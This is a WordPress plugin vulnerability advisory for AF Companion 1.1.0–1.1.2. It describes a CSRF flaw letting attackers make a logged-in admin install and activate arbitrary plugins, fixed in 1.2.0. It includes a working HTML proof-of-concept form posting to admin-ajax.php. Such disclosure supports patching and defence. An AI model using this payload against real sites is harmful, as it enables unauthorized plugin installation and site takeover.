AF Companion 1.1.0 – 1.1.2 – Arbitrary Plugin Installation & Activation via CSRF | Plugin Vulnerabilities

Description

The plugin has a flawed CSRF check, allowing attackers to make logged in admin installs and activate arbitrary plugins from the WP repository

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="aftc_install_activate_plugins" />
      <input type="hidden" name="btnData[]" value="wpscan" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Fixed in 1.2.0

References

URL

https://plugins.trac.wordpress.org/changeset/2647657

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

e689a698-69a7-4c5c-a861-13295115e4d4

Timeline

Publicly Published

2021-12-27 (about 4 years ago)

Added

2021-12-27 (about 4 years ago)

Last Updated

2021-12-27 (about 4 years ago)

Other

Published

Title

Published

2023-02-07

Title

OWM Weather < 5.6.12 - Post Duplication via CSRF

Published

2014-08-01

Title

Published

2025-06-25

Title

Homerunner < 1.0.31 - Cross-Site Request Forgery to Settings Update

Published

2023-11-02

Title

Kadence WooCommerce Email Designer < 1.5.12 - CSRF

Published

2025-06-16

Title

YITH PayPal Express Checkout for WooCommerce < 1.49.1 - Cross-Site Request Forgery